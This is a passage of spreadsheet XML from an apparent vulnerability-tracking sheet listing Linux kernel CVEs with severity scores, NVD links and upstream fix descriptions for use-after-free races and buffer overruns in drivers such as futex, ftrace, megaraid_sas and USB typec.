  under rcu_read_lock() and drops one reference per attached program;
- BPF link release: bpf map delete (no BPF_F_LINK) synchronously calls
  st_ops-&gt;unreg() -&gt; hid_bpf_unreg(), which drops the reference for
  its own registration.
The coordination handshake (e-&gt;hdev = NULL on the destroy side vs
"if (!hdev) return" on the unreg side) is a TOCTOU check: the two
paths run under different lock domains (rcu_read_lock vs
prog_list_lock), so a concurrent unreg can read ops-&gt;hdev as
non-NULL, block on prog_list_lock, and then proceed while the
destroy traversal executes - both paths then drop the same
reference.  The refcount reaches zero legitimately (each decrement
is individually valid), so no refcount_t saturation fires: the
device is simply freed while the transport is still inside
hid_destroy_device(), and subsequent teardown touches freed memory.
The fix serializes the remove/NULL decision under prog_list_lock on
both sides and moves the destroy-side puts outside the lock.  With
the lock held, plain reads/writes of ops-&gt;hdev are sufficient; no
READ_ONCE/WRITE_ONCE are added, keeping the patch minimal.
Unlocked-read safety: the unlocked read of ops-&gt;hdev at the top of
hid_bpf_unreg() cannot touch a freed device, because the unreg path
itself still holds this registration's reference (released only by
its own hid_put_device() after the lock is dropped), and a destroy
traversal that already cleared ops-&gt;hdev makes the lock-internal
re-check return early without any put.  At most one of the two
paths releases each registration reference.</t>
        </is>
      </c>
      <c r="S523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90001</t>
        </is>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B524" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90002</t>
        </is>
      </c>
      <c r="D524" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E524" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F524" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G524" s="5" t="inlineStr"/>
      <c r="H524" s="5" t="inlineStr"/>
      <c r="I524" s="5" t="inlineStr"/>
      <c r="J524" s="5" t="inlineStr"/>
      <c r="K524" s="5" t="inlineStr"/>
      <c r="L524" s="5" t="inlineStr"/>
      <c r="M524" s="5" t="inlineStr"/>
      <c r="N524" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O524" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P524" s="5" t="inlineStr"/>
      <c r="Q524" s="5" t="inlineStr"/>
      <c r="R524" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ftrace: Take trace_array reference before accessing its ftrace_ops
The trace instance files set_ftrace_filter and set_ftrace_notrace was
updated to work with specific trace instances (trace_arrays). The issue is
that when these files are opened, there is a small race window where it
will use the ftrace_ops from the inode-&gt;private pointer to get a reference
to the trace_array and then take its reference. The problem is that the
ftrace_ops itself could be freed. If the rmdir on the instance happens at
the same time the set_ftrace_filter file is opened, the rmdir could have
also freed the ftrace_ops and referencing it will cause a use-after-free
bug and crash the kernel.
Instead, pass in the trace_array as the file private data (NULL for the
top level instance), and then pass both the trace_array and the ftrace_ops
to the ftrace_regex_open() function. If the trace_array is NULL, then it
just uses the ftrace_ops without the need to take its reference (like
normal). If the ftrace_ops is NULL, that is only the case for the top
level instance and the global_ops can be used.
This allows the trace_array to have its reference incremented before
touching the ftrace_ops that could also be freed when the instance is.</t>
        </is>
      </c>
      <c r="S524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90002</t>
        </is>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B525" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90003</t>
        </is>
      </c>
      <c r="D525" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E525" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F525" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G525" s="5" t="inlineStr"/>
      <c r="H525" s="5" t="inlineStr"/>
      <c r="I525" s="5" t="inlineStr"/>
      <c r="J525" s="5" t="inlineStr"/>
      <c r="K525" s="5" t="inlineStr"/>
      <c r="L525" s="5" t="inlineStr"/>
      <c r="M525" s="5" t="inlineStr"/>
      <c r="N525" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O525" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P525" s="5" t="inlineStr"/>
      <c r="Q525" s="5" t="inlineStr"/>
      <c r="R525" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
futex: Prevent rcuwait use-after-free during requeue PI
On PREEMPT_RT, FUTEX_CMP_REQUEUE_PI can trigger a KASAN report
(slab-out-of-bounds) in futex_requeue_pi_complete() invocation of
rcuwait_wake_up().
The futex_q used by futex_wait_requeue_pi() is allocated on the waiter's
stack. An early wakeup can race with a PI requeue as follows:
        waiter                          requeue task
        ------                          ------------
futex_wait_requeue_pi()
  futex_do_wait()
    schedule()
                                       futex_requeue
                                         futex_proxy_trylock_atomic()
                                           futex_requeue_pi_prepare()
                                            Q_REQUEUE_PI_NONE -&gt; Q_REQUEUE_PI_IN_PROGRESS
* timeout/ signal wakes waiter *
  futex_requeue_pi_wakeup_sync()
   Q_REQUEUE_PI_IN_PROGRESS -&gt; Q_REQUEUE_PI_WAIT
                                           requeue_pi_wake_futex
                                             futex_requeue_pi_complete()
                                               cmpxchg Q_REQUEUE_PI_WAIT -&gt; Q_REQUEUE_PI_LOCKED
    rcuwait_wait_event()
      if (atomic_read(&amp;q-&gt;requeue_state) != Q_REQUEUE_PI_WAIT)
       break /* no schedule() */
 /* q.pi_state-&gt;owner == current */
 futex_private_hash_put()
 /* return from syscall */
                                              rcuwait_wake_up(&amp;q-&gt;requeue_wait)
                                                /* q is gone */
futex_requeue_pi_complete() publishes Q_REQUEUE_PI_LOCKED before
calling rcuwait_wake_up(). The waiter observes this state in
rcuwait_wait_event() before invoking schedule() in rcuwait_wait_event().
Here, the waiter is free leave the syscall before requeue task can
complete the wake.
To address this race skip rcuwait_wake_up() in the Q_REQUEUE_PI_LOCKED
case.
This state is only published by requeue_pi_wake_futex(), which saves
q-&gt;task before futex_requeue_pi_complete() and wakes the waiter via
wake_up_state().
This wake is intended to wake the waiter from its futex_do_wait() sleep.
If the waiter is still sleeping there, it can not get into the
Q_REQUEUE_PI_WAIT state (and require this removed wake).
Should the waiter be woken up from futex_do_wait() by other means (as in
this example) and sleep in futex_requeue_pi_wakeup_sync() then the
wake_up_state() from requeue_pi_wake_futex() will wake it, too.
Should the waiter task terminate before wake_up_state() had a chance to
wake the task then the task pointer does not become invalid because the
futex_hash_bucket::lock is held and the task pointer is RCU protected.
[bigeasy: Updated comment and commit message]</t>
        </is>
      </c>
      <c r="S525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90003</t>
        </is>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B526" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90007</t>
        </is>
      </c>
      <c r="D526" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E526" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F526" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G526" s="5" t="inlineStr"/>
      <c r="H526" s="5" t="inlineStr"/>
      <c r="I526" s="5" t="inlineStr"/>
      <c r="J526" s="5" t="inlineStr"/>
      <c r="K526" s="5" t="inlineStr"/>
      <c r="L526" s="5" t="inlineStr"/>
      <c r="M526" s="5" t="inlineStr"/>
      <c r="N526" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O526" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P526" s="5" t="inlineStr"/>
      <c r="Q526" s="5" t="inlineStr"/>
      <c r="R526" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: pm8001: Use rollback index when freeing MSI-X vectors
pm8001_request_msix() unwinds previously registered handlers with
free_irq() when request_irq() fails. The rollback loop uses the failing
index i for every iteration instead of the already registered vector
index j.
That passes the wrong IRQ/dev_id pair to free_irq() and leaves the
earlier handlers installed. Use j for both pci_irq_vector() and the
matching irq_vector entry in the rollback loop.</t>
        </is>
      </c>
      <c r="S526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90007</t>
        </is>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B527" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90008</t>
        </is>
      </c>
      <c r="D527" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E527" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F527" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G527" s="5" t="inlineStr"/>
      <c r="H527" s="5" t="inlineStr"/>
      <c r="I527" s="5" t="inlineStr"/>
      <c r="J527" s="5" t="inlineStr"/>
      <c r="K527" s="5" t="inlineStr"/>
      <c r="L527" s="5" t="inlineStr"/>
      <c r="M527" s="5" t="inlineStr"/>
      <c r="N527" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O527" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P527" s="5" t="inlineStr"/>
      <c r="Q527" s="5" t="inlineStr"/>
      <c r="R527" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: megaraid_sas: Limit NVMe request size to the PRP chain frame
megasas_make_prp_nvme() builds a command's PRP list in cmd-&gt;sg_frame, a
DMA pool buffer of instance-&gt;max_chain_frame_sz bytes, spending one
entry per NVMe page of the transfer plus one per page of the buffer for
the chain pointer. The loop runs until the transfer is described and
never checks the buffer bound.
max_hw_sectors comes straight from the MDTS the firmware reports for the
drive. On drives with a large MDTS the only thing keeping the list
inside the buffer was the block layer default of 1280 KiB, which needs
320 entries, which fit into a 4 KiB frame as that holds 512. But since
commit 9b8b84879d4a ("block: Increase BLK_DEF_MAX_SECTORS_CAP") that
default is 4 MiB, and such a transfer needs 1025 entries, so the list
runs a full page past the end of the frame:
  sd 1:0:1:0: [sdb] tag#630 page boundary ptr_sgl: 0x00000000ba62d13f
  BUG: unable to handle page fault for address: ff663bcb81e7c000
  #PF: supervisor write access in kernel mode
  #PF: error_code(0x0002) - not-present page
  RIP: 0010:megasas_build_and_issue_cmd_fusion+0xeaa/0x1870 [megaraid_sas]
If the page after the frame happens to be mapped, the overrun does not
fault but silently corrupts the neighbouring pool entry, which is
another in-flight command's PRP list.
Cap max_hw_sectors at what the chain frame can describe, less one page
for transfers that do not start on a page boundary and so need one entry
more. This is the megaraid_sas counterpart of commit 04631f55afc5
("scsi: mpt3sas: Limit NVMe request size to 2 MiB"), but derives the
limit from max_chain_frame_sz rather than hardcoding it.</t>
        </is>
      </c>
      <c r="S527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90008</t>
        </is>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B528" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90009</t>
        </is>
      </c>
      <c r="D528" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E528" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F528" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G528" s="5" t="inlineStr"/>
      <c r="H528" s="5" t="inlineStr"/>
      <c r="I528" s="5" t="inlineStr"/>
      <c r="J528" s="5" t="inlineStr"/>
      <c r="K528" s="5" t="inlineStr"/>
      <c r="L528" s="5" t="inlineStr"/>
      <c r="M528" s="5" t="inlineStr"/>
      <c r="N528" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O528" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P528" s="5" t="inlineStr"/>
      <c r="Q528" s="5" t="inlineStr"/>
      <c r="R528" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: bsg: Fix TOCTOU in io_uring passthrough command setup
scsi_bsg_uring_cmd() reads bsg_uring_cmd from the shared mmap'd SQE.
Userspace can change a field after we check it and before we use it.
request_len is the sharp case: it can grow past sizeof(scmd-&gt;cmnd) after
the bound check and overflow scmd-&gt;cmnd in copy_from_user().
READ_ONCE() the SQE fields we check or use into locals before use.</t>
        </is>
      </c>
      <c r="S528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90009</t>
        </is>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B529" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90010</t>
        </is>
      </c>
      <c r="D529" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E529" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F529" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G529" s="5" t="inlineStr"/>
      <c r="H529" s="5" t="inlineStr"/>
      <c r="I529" s="5" t="inlineStr"/>
      <c r="J529" s="5" t="inlineStr"/>
      <c r="K529" s="5" t="inlineStr"/>
      <c r="L529" s="5" t="inlineStr"/>
      <c r="M529" s="5" t="inlineStr"/>
      <c r="N529" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O529" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P529" s="5" t="inlineStr"/>
      <c r="Q529" s="5" t="inlineStr"/>
      <c r="R529" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: bsg: Cap io_uring sense copy to max_response_len
Completion copied scmd-&gt;sense_len to the user response buffer without
honoring max_response_len. After a valid sense, the midlayer sets
sense_len to the real length (up to SCSI_SENSE_BUFFERSIZE), so a smaller
user buffer was overrun.</t>
        </is>
      </c>
      <c r="S529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90010</t>
        </is>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B530" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90013</t>
        </is>
      </c>
      <c r="D530" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E530" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F530" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G530" s="5" t="inlineStr"/>
      <c r="H530" s="5" t="inlineStr"/>
      <c r="I530" s="5" t="inlineStr"/>
      <c r="J530" s="5" t="inlineStr"/>
      <c r="K530" s="5" t="inlineStr"/>
      <c r="L530" s="5" t="inlineStr"/>
      <c r="M530" s="5" t="inlineStr"/>
      <c r="N530" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O530" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P530" s="5" t="inlineStr"/>
      <c r="Q530" s="5" t="inlineStr"/>
      <c r="R530" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Take trace_array reference when opening options file
The options files do not take the trace_array reference for the options
they represent. This could cause a use-after-free kernel crash if one of
these files is opened by one task and another task removes the instance
that the option is for. Because it doesn't take a reference upon opening,
it will not stop the removal which will free the options descriptor that
is being used.
As the options are somewhat dynamic in their creation at boot up, each
file represents a flag in the trace_array. The trace_array has an array of
indexes to represent each of these flags that is stored in the
trace_flags_index array. The address of the index array element is used to
pass to the inode-&gt;i_private pointer. Then that element is read which
holds the index (which represents the flag) and then the index is used to
calculate the trace_array descriptor from its trace_flags_index array.
One issue is that the index element can not be referenced until the
trace_array's reference is taken. To handle this, create a new helper
function called: trace_array_options_get() that will iterate all the
existing trace_arrays in the ftrace_trace_arrays list (under the
trace_types_lock), and compare the passed in address of the index element
with the entire array of the trace_array's trace_flags_index array.
If it matches, then up the corresponding trace_array's reference and
return.</t>
        </is>
      </c>
      <c r="S530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90013</t>
        </is>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B531" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90014</t>
        </is>
      </c>
      <c r="D531" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E531" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F531" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G531" s="5" t="inlineStr"/>
      <c r="H531" s="5" t="inlineStr"/>
      <c r="I531" s="5" t="inlineStr"/>
      <c r="J531" s="5" t="inlineStr"/>
      <c r="K531" s="5" t="inlineStr"/>
      <c r="L531" s="5" t="inlineStr"/>
      <c r="M531" s="5" t="inlineStr"/>
      <c r="N531" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O531" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P531" s="5" t="inlineStr"/>
      <c r="Q531" s="5" t="inlineStr"/>
      <c r="R531" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Have show_event_filters/triggers files take trace array ref
The newly added files show_event_filters and show_event_triggers that show
all filters or triggers that are set within the trace array do not take a
reference for the trace array it is showing. Without taking a reference,
the trace_array may be freed via "rmdir" while a task is reading one of
theses files. Those files iterate all the events within an instance
(trace_array) and nothing prevents that instance from being freed while
its data is being read. This causes a use-after-free crash.
Have the open of both those files take the trace_array reference via the
trace_array_get() that prevents the trace_array from being freed while the
files are opened.</t>
        </is>
      </c>
      <c r="S531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90014</t>
        </is>
      </c>
    </row>
    <row r="532">
      <c r="A532" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B532" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90022</t>
        </is>
      </c>
      <c r="D532" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E532" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F532" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G532" s="5" t="inlineStr"/>
      <c r="H532" s="5" t="inlineStr"/>
      <c r="I532" s="5" t="inlineStr"/>
      <c r="J532" s="5" t="inlineStr"/>
      <c r="K532" s="5" t="inlineStr"/>
      <c r="L532" s="5" t="inlineStr"/>
      <c r="M532" s="5" t="inlineStr"/>
      <c r="N532" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O532" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P532" s="5" t="inlineStr"/>
      <c r="Q532" s="5" t="inlineStr"/>
      <c r="R532" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: f_midi2: fix use-after-free in string attribute show path
f_midi2_opts_str_show() takes the string lock internally, but its
callers dereference the opts-&gt;info.&lt;field&gt; pointer before calling it,
outside the lock. This races with f_midi2_opts_str_store(), which
frees the old string under opts-&gt;lock when the attribute is written
concurrently, the show path can read a pointer that gets freed
before the lock inside str_show() is even taken.
Change f_midi2_opts_str_show() to take a pointer to the string field,
matching the existing pattern in f_midi2_opts_str_store(), and
dereference it only after the lock is held. Update all three callers
(iface_name, block name, and the EP string option macro) accordingly.</t>
        </is>
      </c>
      <c r="S532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90022</t>
        </is>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B533" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90026</t>
        </is>
      </c>
      <c r="D533" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E533" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F533" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G533" s="5" t="inlineStr"/>
      <c r="H533" s="5" t="inlineStr"/>
      <c r="I533" s="5" t="inlineStr"/>
      <c r="J533" s="5" t="inlineStr"/>
      <c r="K533" s="5" t="inlineStr"/>
      <c r="L533" s="5" t="inlineStr"/>
      <c r="M533" s="5" t="inlineStr"/>
      <c r="N533" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O533" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P533" s="5" t="inlineStr"/>
      <c r="Q533" s="5" t="inlineStr"/>
      <c r="R533" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: typec: qcom-pmic: cancel reset_work on stop
pdphy_stop() disables IRQs but leaves reset_work pending.  If the IRQ
handler schedules it just before disable_irq(), the work runs after
remove() frees the struct via devm.
Call cancel_work_sync() after disabling IRQs to close the window.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90026</t>
        </is>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B534" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90027</t>
        </is>
      </c>
      <c r="D534" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E534" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F534" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G534" s="5" t="inlineStr"/>
      <c r="H534" s="5" t="inlineStr"/>
      <c r="I534" s="5" t="inlineStr"/>
      <c r="J534" s="5" t="inlineStr"/>
      <c r="K534" s="5" t="inlineStr"/>
      <c r="L534" s="5" t="inlineStr"/>
      <c r="M534" s="5" t="inlineStr"/>
      <c r="N534" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O534" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P534" s="5" t="inlineStr"/>
      <c r="Q534" s="5" t="inlineStr"/>
      <c r="R534" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: typec: qcom-pmic-typec: disable cc_debounce_dwork on stop
cc_debounce_dwork is queued from the set_cc() and start_toggling()
callbacks, which run from TCPM's kthread worker.  port_stop() returns
before tcpm_unregister_port() destroys that worker.  Flushing the worker
during unregister may therefore run a callback which queues the delayed
work after port_stop() has returned.
The delayed work can then run after devres has freed pmic_typec_port.
Use disable_delayed_work_sync() in port_stop() to cancel a pending
instance and prevent the TCPM callbacks from queueing another one.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90027</t>
        </is>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B535" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90030</t>
        </is>
      </c>
      <c r="D535" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E535" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F535" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G535" s="5" t="inlineStr"/>
      <c r="H535" s="5" t="inlineStr"/>
      <c r="I535" s="5" t="inlineStr"/>
      <c r="J535" s="5" t="inlineStr"/>
      <c r="K535" s="5" t="inlineStr"/>
      <c r="L535" s="5" t="inlineStr"/>
      <c r="M535" s="5" t="inlineStr"/>
      <c r="N535" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O535" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P535" s="5" t="inlineStr"/>
      <c r="Q535" s="5" t="inlineStr"/>
      <c r="R535" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: dwc3: clear forceRM when issuing EndTransfer
The forceRM bit of the DEPCMD register controls the behavior of the
EndTransfer command used to stop an active transfer. Older DWC3
programming guide revisions recommended setting forceRM=1 when
issuing EndTransfer. Newer programming guide revisions recommend
issuing EndTransfer with forceRM cleared.
With forceRM=1 on DWC_usb31 v2.00a and v2.10a controllers, a transfer
aborted through the ep_dequeue path was observed to remain active
after EndTransfer completion. A subsequent StartTransfer issued on the
same endpoint triggered writes associated with the aborted transfer.
This resulted in an SMMU fault because the transfer buffer had already
been unmapped during EndTransfer command-completion cleanup.
Using forceRM=0 eliminates the issue. Although older DWC3 programming
guide revisions recommended setting forceRM=1, no issues are known
from using forceRM=0. Clear forceRM when issuing EndTransfer to provide
consistent EndTransfer behavior and align with newer programming guide
recommendations.</t>
        </is>
      </c>
      <c r="S535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90030</t>
        </is>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B536" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90032</t>
        </is>
      </c>
      <c r="D536" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E536" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F536" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G536" s="5" t="inlineStr"/>
      <c r="H536" s="5" t="inlineStr"/>
      <c r="I536" s="5" t="inlineStr"/>
      <c r="J536" s="5" t="inlineStr"/>
      <c r="K536" s="5" t="inlineStr"/>
      <c r="L536" s="5" t="inlineStr"/>
      <c r="M536" s="5" t="inlineStr"/>
      <c r="N536" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O536" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P536" s="5" t="inlineStr"/>
      <c r="Q536" s="5" t="inlineStr"/>
      <c r="R536" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: usbtv: keep device alive while ALSA card exists
The ALSA PCM callbacks store the driver state in pcm-&gt;private_data. An
open PCM file can outlive USB disconnect because usbtv_audio_free() uses
snd_card_free_when_closed(). The disconnect path can then drop the V4L2
device reference and free struct usbtv before ALSA releases the substream,
so a later close dereferences freed memory in snd_usbtv_pcm_close().
